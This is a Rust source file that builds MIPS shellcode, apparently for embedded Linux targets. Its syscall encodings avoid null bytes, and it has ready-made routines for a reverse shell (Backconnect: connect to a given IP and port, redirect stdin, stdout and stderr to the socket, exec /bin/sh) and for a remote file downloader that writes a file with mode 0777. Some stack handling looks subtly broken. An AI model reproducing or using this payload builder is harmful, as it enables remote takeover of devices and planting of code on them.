use crate::Endian;
use crate::Mips::MipsRegister;

use super::{RTypeInstruction, ITypeInstruction};
use super::{MipsInstruction, MipsInstructionOpcode, MipsInstructionFunctionCode};


#[derive (Debug, Clone)]
pub struct Shell
{
	endian: Endian,
	instructions: Vec<MipsInstruction>,
}

impl Shell
{
	pub fn New (endian: Endian) -> Self
	{
		Self
		{
			endian,
			instructions: Vec::new (),
		}
	}

	pub fn Lui (&mut self, rt: MipsRegister, number: u16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::LUI, MipsRegister::ZERO, rt, number)));
	}

	pub fn Ori (&mut self, rt: MipsRegister, rs: MipsRegister, number: u16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::ORI, rs, rt, number)));
	}

	pub fn Or (&mut self, rd: MipsRegister, rt: MipsRegister, rs: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, rd, 0, MipsInstructionFunctionCode::OR)));
	}

	pub fn Li (&mut self, register: MipsRegister, number: u32)
	{
		let upperHalf = ((number&0xffff_0000)>>16) as u16;
		let lowerHalf = (number&0x0000_ffff) as u16;
		self.Lui (register, upperHalf);
		self.Ori (register, register, lowerHalf);
	}

	pub fn Add (&mut self, rd: MipsRegister, rs: MipsRegister, rt: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, rd, 0, MipsInstructionFunctionCode::ADD)));
	}

	pub fn Addi (&mut self, rt: MipsRegister, rs: MipsRegister, imm: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::ADDI, rs, rt, imm as u16)))
	}

	pub fn Addiu (&mut self, rt: MipsRegister, rs: MipsRegister, imm: u16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::ADDIU, rs, rt, imm)))
	}

	pub fn Sub (&mut self, rd: MipsRegister, rs: MipsRegister, rt: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, rd, 0, MipsInstructionFunctionCode::SUB)));
	}

	pub fn Subu (&mut self, rd: MipsRegister, rs: MipsRegister, rt: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, rd, 0, MipsInstructionFunctionCode::SUBU)));
	}

	pub fn Subi (&mut self, rt: MipsRegister, rs: MipsRegister, imm: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::ADDI, rs, rt, -imm as u16)))
	}

	pub fn Xori (&mut self, rt: MipsRegister, rs: MipsRegister, imm: u16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::XORI, rs, rt, imm as u16)))
	}

	pub fn Mult (&mut self, rs: MipsRegister, rt: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, MipsRegister::ZERO, 0, MipsInstructionFunctionCode::MULT)));
	}

	pub fn Multu (&mut self, rs: MipsRegister, rt: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, MipsRegister::ZERO, 0, MipsInstructionFunctionCode::MULTU)));
	}

	pub fn Mfhi (&mut self, rd: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, MipsRegister::ZERO, MipsRegister::ZERO, rd, 0, MipsInstructionFunctionCode::MFHI)));
	}

	pub fn Mflo (&mut self, rd: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, MipsRegister::ZERO, MipsRegister::ZERO, rd, 0, MipsInstructionFunctionCode::MFLO)));
	}

	pub fn Lb (&mut self, rt: MipsRegister, rs: MipsRegister, offset: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::LB, rs, rt, offset as u16)));
	}

	pub fn Lhu (&mut self, rt: MipsRegister, rs: MipsRegister, offset: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::LHU, rs, rt, offset as u16)));
	}

	pub fn Lw (&mut self, rt: MipsRegister, rs: MipsRegister, offset: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::LW, rs, rt, offset as u16)));
	}

	pub fn Sh (&mut self, rt: MipsRegister, rs: MipsRegister, offset: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::SH, rs, rt, offset as u16)));
	}

	pub fn Sw (&mut self, rt: MipsRegister, rs: MipsRegister, offset: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::SW, rs, rt, offset as u16)));
	}

	pub fn Slt (&mut self, rd: MipsRegister, rs: MipsRegister, rt: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, rd, 0, MipsInstructionFunctionCode::SLT)));
	}

	pub fn Sltu (&mut self, rd: MipsRegister, rs: MipsRegister, rt: MipsRegister)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, rd, 0, MipsInstructionFunctionCode::SLTU)));
	}

	pub fn Slti (&mut self, rt: MipsRegister, rs: MipsRegister, imm: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::SLTI, rs, rt, imm as u16)));
	}

	pub fn Sltiu (&mut self, rt: MipsRegister, rs: MipsRegister, imm: u16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::SLTIU, rs, rt, imm)));
	}

	pub fn Syscall (&mut self, imm: usize)
	{
		// get the fill value
		let imm = imm&0xfffff;
		let rs = ((imm&0b11111_00000_00000_00000)>>15).try_into ().unwrap ();
		let rt = ((imm&0b00000_11111_00000_00000)>>10).try_into ().unwrap ();
		let rd = ((imm&0b00000_00000_11111_00000)>>5).try_into ().unwrap ();
		let shamt = (imm&0b00000_00000_00000_11111).try_into ().unwrap ();

		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, rs, rt, rd, shamt, MipsInstructionFunctionCode::SYSCALL)));
	}

	// offset is instruction count, aka offset>>2
	pub fn Bne (&mut self, rs: MipsRegister, rt: MipsRegister, offset: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::BNE, rs, rt, offset as u16)));
	}

	// offset is instruction count, aka offset>>2
	pub fn Beq (&mut self, rs: MipsRegister, rt: MipsRegister, offset: i16)
	{
		self.instructions.push (MipsInstruction::IType(ITypeInstruction::New (MipsInstructionOpcode::BEQ, rs, rt, offset as u16)));
	}

	pub fn Sync (&mut self)
	{
		self.instructions.push (MipsInstruction::RType(RTypeInstruction::New (MipsInstructionOpcode::REG, MipsRegister::T9, MipsRegister::T9, MipsRegister::T9, 0, MipsInstructionFunctionCode::SYNC)));
	}

	// sub $sp by 4
	pub fn PushU32 (&mut self, value: u32)
	{
		// save $t0
		self.Subi (MipsRegister::SP, MipsRegister::SP, 8);
		self.Sw (MipsRegister::T0, MipsRegister::SP, 0);

		// load value to $t0 and push $t0 to stack
		self.Li (MipsRegister::T0, value);
		self.Sw (MipsRegister::T0, MipsRegister::SP, 4);
		self.Addi (MipsRegister::SP, MipsRegister::SP, 4);
	}

	// always pad data to 4 bytes chunk
	// return the number of $sp subtracted
	pub fn PushByteArray (&mut self, data: &[u8]) -> usize
	{
		let mut data = data.to_vec ();

		// align data
		let paddingLen = ((data.len () + 4 - 1)/4)*4 - data.len ();
		data.append (&mut vec! [0u8; paddingLen]);

		for i in (0..data.len ()).step_by (4).rev ()
		{
			match self.endian
			{
				Endian::BIG =>
					self.PushU32 (u32::from_be_bytes (data[i..i + 4].try_into ().unwrap ())),
				Endian::LITTLE => self.PushU32 (u32::from_le_bytes (data[i..i + 4].try_into ().unwrap ())),
			};
		}

		data.len ()
	}

	pub fn PushString (&mut self, string: &str) -> usize
	{
		let mut tmp = string.as_bytes ().to_vec ();
		tmp.push (0);   // add null byte
		self.PushByteArray (&tmp)
	}

	pub fn GetLabel (&self) -> usize
	{
		self.instructions.len ()
	}

	// label is usize, instruction count, aka offset>>2
	pub fn BeqLabel (&mut self, rs: MipsRegister, rt: MipsRegister, label: usize)
	{
		let offset = label as isize - (self.instructions.len () as isize + 1);
		self.Beq (rs, rt, offset as i16);
	}

	// label is usize, instruction count, aka offset>>2
	pub fn BneLabel (&mut self, rs: MipsRegister, rt: MipsRegister, label: usize)
	{
		let offset = label as isize - (self.instructions.len () as isize + 1);
		self.Bne (rs, rt, offset as i16);
	}

	pub fn ToByteArray (&self) -> Vec<u8>
	{
		let mut result = Vec::new ();

		for instruction in &self.instructions
		{
			result.append (&mut instruction.ToByteArray (self.endian));
		}

		result
	}

	pub fn ToAssemblySource (&self) -> String
	{
		let mut result = String::new ();

		for instruction in &self.instructions
		{
			result.push_str (&instruction.ToAssemblySource ());
		}

		result
	}

	// return fd in $v0
	// TODO: add flags
	pub fn CreateFile (&mut self, filename: &str, mode: u32)
	{
		let filenameSize = self.PushString (filename);

		// call open ('$sp', 'O_RDWR', 0777)
		self.Addi (MipsRegister::A0, MipsRegister::SP, 0);
		self.Li (MipsRegister::A1, 0x102);
		self.Li (MipsRegister::A2, mode);
		self.Li (MipsRegister::V0, 0xfa5);
		self.Syscall (0x40404);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, filenameSize as i16);
	}

	pub fn OpenFile (&mut self, filename: &str, mode: u32)
	{
		unimplemented! ();
	}

	pub fn ReadFromFile (&mut self, filename: &str, bufAddr: MipsRegister, size: usize)
	{
		unimplemented! ();
	}

	pub fn ReadFromFd (&mut self, fd: usize, bufAddr: MipsRegister, size: usize)
	{
		// save args
		self.Subi (MipsRegister::SP, MipsRegister::SP, 4);
		self.Sw (bufAddr, MipsRegister::SP, 0);

		// load args
		self.Li (MipsRegister::A0, fd as u32);
		self.Lw (MipsRegister::A1, MipsRegister::SP, 0);
		self.Li (MipsRegister::A2, size as u32);
		self.Li (MipsRegister::V0, 0xfa3);
		self.Syscall (0x40404);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 4);
	}

	pub fn ReadFromFdRegister (&mut self, fdReg: MipsRegister, bufAddr: MipsRegister, size: usize)
	{
		// save args
		self.Subi (MipsRegister::SP, MipsRegister::SP, 8);
		self.Sw (fdReg, MipsRegister::SP, 0);
		self.Sw (bufAddr, MipsRegister::SP, 4);

		// load args
		self.Lw (MipsRegister::A0, MipsRegister::SP, 0);
		self.Lw (MipsRegister::A1, MipsRegister::SP, 4);
		self.Li (MipsRegister::A2, size as u32);
		self.Li (MipsRegister::V0, 0xfa3);
		self.Syscall (0x40404);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 8);
	}

	pub fn WriteToFile (&mut self, filename: &str, bufAddr: MipsRegister, size: usize)
	{
		unimplemented! ();
	}

	pub fn WriteToFd (&mut self, fd: usize, bufAddr: MipsRegister, size: usize)
	{
		// save args
		self.Subi (MipsRegister::SP, MipsRegister::SP, 4);
		self.Sw (bufAddr, MipsRegister::SP, 0);

		// load args
		self.Li (MipsRegister::A0, fd as u32);
		self.Lw (MipsRegister::A1, MipsRegister::SP, 0);
		self.Li (MipsRegister::A2, size as u32);
		self.Li (MipsRegister::V0, 0xfa4);
		self.Syscall (0x40404);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 4);
	}

	pub fn WriteToFdRegister (&mut self, fdReg: MipsRegister, bufAddr: MipsRegister, size: usize)
	{
		// save args
		self.Subi (MipsRegister::SP, MipsRegister::SP, 8);
		self.Sw (fdReg, MipsRegister::SP, 0);
		self.Sw (bufAddr, MipsRegister::SP, 4);

		// load args
		self.Lw (MipsRegister::A0, MipsRegister::SP, 0);
		self.Lw (MipsRegister::A1, MipsRegister::SP, 4);
		self.Li (MipsRegister::A2, size as u32);
		self.Li (MipsRegister::V0, 0xfa4);
		self.Syscall (0x40404);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 8);
	}

	pub fn ReadLineFromFile (&mut self, filename: &str, bufAddr: MipsRegister, maxSize: usize)
	{
		unimplemented! ();
	}

	pub fn ReadLineFromFd (&mut self, fd: usize, bufAddr: MipsRegister, maxSize: usize)
	{
		unimplemented! ();
	}

	pub fn ReadLineFromFdRegister (&mut self, fdReg: MipsRegister, bufAddr: MipsRegister, maxSize: usize)
	{
		// save $s0, $s1, $s2
		self.Subi (MipsRegister::SP, MipsRegister::SP, 12);
		self.Sw (MipsRegister::S0, MipsRegister::SP, 0);
		self.Sw (MipsRegister::S1, MipsRegister::SP, 4);
		self.Sw (MipsRegister::S2, MipsRegister::SP, 8);

		// save args
		self.Subi (MipsRegister::SP, MipsRegister::SP, 8);
		self.Sw (fdReg, MipsRegister::SP, 0);
		self.Sw (bufAddr, MipsRegister::SP, 4);

		// load args
		// $s0: fd
		// $s1: buffer ptr
		// $s2: maxsize
		self.Lw (MipsRegister::S0, MipsRegister::SP, 0);
		self.Lw (MipsRegister::S1, MipsRegister::SP, 4);
		self.Li (MipsRegister::S2, maxSize as u32);

		let readLoop = self.GetLabel ();

		// read 1 byte
		self.ReadFromFdRegister (MipsRegister::S0, MipsRegister::S1, 1);

		// cmp to \n
		// jump forward 9 instructions if ok
		// minus 1 due to pc + 4
		self.Li (MipsRegister::T0, 0x0a);
		self.Lb (MipsRegister::T1, MipsRegister::S1, 0);
		self.Beq (MipsRegister::T0, MipsRegister::T1, 8);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		// adjust max size and buffer addr
		self.Addi (MipsRegister::S1, MipsRegister::S1, 1);
		self.Subi (MipsRegister::S2, MipsRegister::S2, 1);

		// jump back to readLoop if $s0 != 0
		self.BneLabel (MipsRegister::S2, MipsRegister::ZERO, readLoop);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		//set $v0 to 1 and jump forward
		self.Addi (MipsRegister::V0, MipsRegister::ZERO, 1);
		self.Beq (MipsRegister::ZERO, MipsRegister::ZERO, 2);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		// set $v0 to 0
		self.Addi (MipsRegister::V0, MipsRegister::ZERO, 0);

		// restore $s0, $s1, $s2
		self.Addi (MipsRegister::SP, MipsRegister::SP, 8);
		self.Lw (MipsRegister::S0, MipsRegister::SP, 0);
		self.Lw (MipsRegister::S1, MipsRegister::SP, 4);
		self.Lw (MipsRegister::S2, MipsRegister::SP, 8);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 12);
	}

	pub fn CloseFd (&mut self, fd: usize)
	{
		self.Li (MipsRegister::A0, fd as u32);
		self.Li (MipsRegister::V0, 0xfa6);
		self.Syscall (0x40404);
	}

	pub fn CloseFdRegister (&mut self, fdReg: MipsRegister)
	{
		self.Addi (MipsRegister::A0, fdReg, 0);
		self.Li (MipsRegister::V0, 0xfa6);
		self.Syscall (0x40404);
	}

	pub fn StringToInt (&mut self, bufAddr: MipsRegister)
	{
		// save args
		self.Subi (MipsRegister::SP, MipsRegister::SP, 4);
		self.Sw (bufAddr, MipsRegister::SP, 0);

		// load args
		self.Lw (MipsRegister::T0, MipsRegister::SP, 0);

		// set $v0 to 0
		self.Addi (MipsRegister::V0, MipsRegister::ZERO, 0);

		let readLoop = self.GetLabel ();

		// read 1 char
		self.Lb (MipsRegister::T1, MipsRegister::T0, 0);

		// check if not number, jump out
		self.Subi (MipsRegister::T1, MipsRegister::T1, 0x30);
		self.Sltiu (MipsRegister::T2, MipsRegister::T1, 10);

		// jump forward 9 instructions
		// minus 1 due to pc+4
		self.Beq (MipsRegister::T2, MipsRegister::ZERO, 8);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		// mul v0 by 10
		self.Li (MipsRegister::T3, 10);
		self.Multu (MipsRegister::V0, MipsRegister::T3);
		self.Mflo (MipsRegister::V0);

		// add to v0
		self.Add (MipsRegister::V0, MipsRegister::V0, MipsRegister::T1);

		// increase $t0
		self.Addi (MipsRegister::T0, MipsRegister::T0, 1);

		// jump back
		self.BeqLabel (MipsRegister::ZERO, MipsRegister::ZERO, readLoop);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 4);
	}

	// dup from source to des
	pub fn Dup2 (&mut self, source: MipsRegister, des: MipsRegister)
	{
		// save args
		self.Subi (MipsRegister::SP, MipsRegister::SP, 8);
		self.Sw (source, MipsRegister::SP, 0);
		self.Sw (des, MipsRegister::SP, 4);

		// load args
		self.Lw (MipsRegister::A0, MipsRegister::SP, 0);
		self.Lw (MipsRegister::A1, MipsRegister::SP, 4);

		// call dup2 (source, des)
		self.Li (MipsRegister::V0, 0xfdf);
		self.Syscall (0x40404);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 8);
	}

	pub fn Execve (&mut self, path: &str)
	{
		// push path, save addr to $a0
		let pathSize = self.PushString (path);
		self.Addi (MipsRegister::A0, MipsRegister::SP, 0);

		// build arg array
		self.Subi (MipsRegister::SP, MipsRegister::SP, 8);
		self.Sw (MipsRegister::A0, MipsRegister::SP, 0);
		self.Sw (MipsRegister::ZERO, MipsRegister::SP, 4);

		// call execve (path, [path, NULL], NULL)
		self.Addi (MipsRegister::A1, MipsRegister::SP, 0);
		self.Addi (MipsRegister::A2, MipsRegister::ZERO, 0);
		self.Li (MipsRegister::V0, 0xfab);
		self.Syscall (0x40404);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, (8 + pathSize) as i16);
	}

	// return fd into v0
	pub fn Connect (&mut self, ip: &str, port: u16)
	{
		let mut ip: Vec<u8> = ip.trim ().split_terminator (".").map (|x| x.parse::<u8> ().unwrap ()).collect ();
		let mut port = port.to_be_bytes ().to_vec ();

		// call socket (0, 2, 0)
		self.Li (MipsRegister::A0, 2);
		self.Li (MipsRegister::A1, 2);
		self.Li (MipsRegister::A2, 0);
		self.Li (MipsRegister::V0, 0x1057);
		self.Syscall (0x40404);

		// save $s0
		self.Subi (MipsRegister::SP, MipsRegister::SP, 4);
		self.Sw (MipsRegister::S0, MipsRegister::SP, 0);

		// save open socket to $s0
		self.Addi (MipsRegister::S0, MipsRegister::V0, 0);

		// build struct addr
		let mut addrStruct = Vec::new ();
		addrStruct.push (0);
		addrStruct.push (2);
		addrStruct.append (&mut port);
		addrStruct.append (&mut ip);

		// push struct addr
		let structAddrSize = self.PushByteArray (&addrStruct);

		// call connect
		self.Addi (MipsRegister::A0, MipsRegister::S0, 0);
		self.Addi (MipsRegister::A1, MipsRegister::SP, 0);
		self.Li (MipsRegister::A2, 0x10);
		self.Li (MipsRegister::V0, 0x104a);
		self.Syscall (0x40404);

		// return socket in $v0
		self.Addi (MipsRegister::V0, MipsRegister::S0, 0);

		// restore stack and reload $s0
		self.Addi (MipsRegister::SP, MipsRegister::SP, structAddrSize as i16);
		self.Lw (MipsRegister::S0, MipsRegister::SP, 0);
		self.Addi (MipsRegister::SP, MipsRegister::SP, 4);
	}

	pub fn Download (&mut self, ip: &str, port: u16, path: &str, filename: &str)
	{
		// save $s0-7
		self.Subi (MipsRegister::SP, MipsRegister::SP, 4*8);
		self.Sw (MipsRegister::S0, MipsRegister::SP, 0x00);
		self.Sw (MipsRegister::S1, MipsRegister::SP, 0x04);
		self.Sw (MipsRegister::S2, MipsRegister::SP, 0x08);
		self.Sw (MipsRegister::S3, MipsRegister::SP, 0x0c);
		self.Sw (MipsRegister::S4, MipsRegister::SP, 0x10);
		self.Sw (MipsRegister::S5, MipsRegister::SP, 0x14);
		self.Sw (MipsRegister::S6, MipsRegister::SP, 0x18);
		self.Sw (MipsRegister::S7, MipsRegister::SP, 0x1c);

		// create file, save fd to $s0
		self.CreateFile (filename, 0o777);
		self.Addi (MipsRegister::S0, MipsRegister::V0, 0);

		// connect, save fd to $s1
		self.Connect (ip, port);
		self.Addi (MipsRegister::S1, MipsRegister::V0, 0);

		// alloc recv buffer
		self.Subi (MipsRegister::SP, MipsRegister::SP, 0x100);
		self.Addi (MipsRegister::S2, MipsRegister::SP, 0);

		// make request string
		let mut requestString = String::new ();
		requestString.push_str (&format! ("GET {} HTTP/1.1\r\n", path));
		requestString.push_str (&format! ("Host: {}\r\n", ip));
		requestString.push_str ("Connection: close\r\n");
		requestString.push_str ("\r\n");

		// push request string to stack, save addr to $s3
		let requestSize = self.PushString (&requestString);
		self.Addi (MipsRegister::S3, MipsRegister::SP, 0);

		// save Content-Leng to compare later
		self.PushString ("Content-Leng");
		self.Lw (MipsRegister::S4, MipsRegister::SP, 0);
		self.Lw (MipsRegister::S5, MipsRegister::SP, 4);
		self.Lw (MipsRegister::S6, MipsRegister::SP, 8);
		self.Addi (MipsRegister::SP, MipsRegister::SP, 12);

		// send request by calling write on fd in $s1
		self.WriteToFdRegister (MipsRegister::S1, MipsRegister::S3, requestSize);

		// recv loop
		// call read($s1, $s3, 0x100)
		let contentLengthRecvLoop = self.GetLabel ();
		self.ReadLineFromFdRegister (MipsRegister::S1, MipsRegister::S2, 0x100);

		// load data to compare
		self.Lw (MipsRegister::T0, MipsRegister::S2, 0);
		self.Lw (MipsRegister::T1, MipsRegister::S2, 4);
		self.Lw (MipsRegister::T2, MipsRegister::S2, 8);

		// compare $t0-2 with $s4-6, only continue if passed all checks
		// jump back to contentLengthRecvLoop otherwise
		self.BneLabel (MipsRegister::T0, MipsRegister::S4, contentLengthRecvLoop);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		self.BneLabel (MipsRegister::T1, MipsRegister::S5, contentLengthRecvLoop);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		self.BneLabel (MipsRegister::T2, MipsRegister::S6, contentLengthRecvLoop);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		// convert the string after 'content-length: ' to num and save to $s7
		self.Addi (MipsRegister::T0, MipsRegister::S2, 16);
		self.StringToInt (MipsRegister::T0);
		self.Addi (MipsRegister::S7, MipsRegister::V0, 0);


		// skip header loop
		// use to skip all the remaining headers
		let skipHeaderLoop = self.GetLabel ();

		self.ReadLineFromFdRegister (MipsRegister::S1, MipsRegister::S2, 0x100);

		// check if this is the last line of header '\r\n'
		self.Lhu (MipsRegister::T0, MipsRegister::S2, 0);
		self.Li (MipsRegister::T1, 0x0000_0d0a);
		self.BneLabel (MipsRegister::T0, MipsRegister::T1, skipHeaderLoop);

		// file recv loop
		// read from fd in $s1, save to fd in $s0
		// reuse the recv buffer
		let fileRecvLoop = self.GetLabel ();

		self.ReadFromFdRegister (MipsRegister::S1, MipsRegister::S2, 1);
		self.WriteToFdRegister (MipsRegister::S0, MipsRegister::S2, 1);
		self.Subi (MipsRegister::S7, MipsRegister::S7, 1);
		self.BneLabel (MipsRegister::S7, MipsRegister::ZERO, fileRecvLoop);
		self.Or (MipsRegister::T9, MipsRegister::T9, MipsRegister::T9);

		// close file and socket
		self.CloseFdRegister (MipsRegister::S0);
		self.CloseFdRegister (MipsRegister::S1);

		// restore $s0-7
		self.Lw (MipsRegister::S0, MipsRegister::SP, 0x00);
		self.Lw (MipsRegister::S1, MipsRegister::SP, 0x04);
		self.Lw (MipsRegister::S2, MipsRegister::SP, 0x08);
		self.Lw (MipsRegister::S3, MipsRegister::SP, 0x0c);
		self.Lw (MipsRegister::S4, MipsRegister::SP, 0x10);
		self.Lw (MipsRegister::S5, MipsRegister::SP, 0x14);
		self.Lw (MipsRegister::S6, MipsRegister::SP, 0x18);
		self.Lw (MipsRegister::S7, MipsRegister::SP, 0x1c);

		// restore stack
		self.Subi (MipsRegister::SP, MipsRegister::SP, 4*8);
	}

	pub fn Backconnect (&mut self, ip: &str, port: u16)
	{
		// save $s0-7
		self.Subi (MipsRegister::SP, MipsRegister::SP, 4*8);
		self.Sw (MipsRegister::S0, MipsRegister::SP, 0x00);
		self.Sw (MipsRegister::S1, MipsRegister::SP, 0x04);
		self.Sw (MipsRegister::S2, MipsRegister::SP, 0x08);
		self.Sw (MipsRegister::S3, MipsRegister::SP, 0x0c);
		self.Sw (MipsRegister::S4, MipsRegister::SP, 0x10);
		self.Sw (MipsRegister::S5, MipsRegister::SP, 0x14);
		self.Sw (MipsRegister::S6, MipsRegister::SP, 0x18);
		self.Sw (MipsRegister::S7, MipsRegister::SP, 0x1c);

		// connect, save fd to $s0
		self.Connect (ip, port);
		self.Addi (MipsRegister::S0, MipsRegister::V0, 0);

		// call dup2 stdin/stdout/stderr to socket
		self.Addi (MipsRegister::A0, MipsRegister::S0, 0);
		self.Li (MipsRegister::A1, 0);
		self.Dup2 (MipsRegister::A0, MipsRegister::A1);

		self.Addi (MipsRegister::A0, MipsRegister::S0, 0);
		self.Li (MipsRegister::A1, 1);
		self.Dup2 (MipsRegister::A0, MipsRegister::A1);

		self.Addi (MipsRegister::A0, MipsRegister::S0, 0);
		self.Li (MipsRegister::A1, 2);
		self.Dup2 (MipsRegister::A0, MipsRegister::A1);

		// call execve ('sh', ['sh', NULL], NULL)
		self.Execve ("/bin/sh");

		// restore $s0-7
		self.Lw (MipsRegister::S0, MipsRegister::SP, 0x00);
		self.Lw (MipsRegister::S1, MipsRegister::SP, 0x04);
		self.Lw (MipsRegister::S2, MipsRegister::SP, 0x08);
		self.Lw (MipsRegister::S3, MipsRegister::SP, 0x0c);
		self.Lw (MipsRegister::S4, MipsRegister::SP, 0x10);
		self.Lw (MipsRegister::S5, MipsRegister::SP, 0x14);
		self.Lw (MipsRegister::S6, MipsRegister::SP, 0x18);
		self.Lw (MipsRegister::S7, MipsRegister::SP, 0x1c);

		// restore stack
		self.Addi (MipsRegister::SP, MipsRegister::SP, 4*8);
	}

	pub fn Exit (&mut self, exitcode: usize)
	{
		self.Li (MipsRegister::A0, exitcode as u32);
		self.Li (MipsRegister::V0, 0xfa1);
		self.Syscall (0x40404);
	}
}
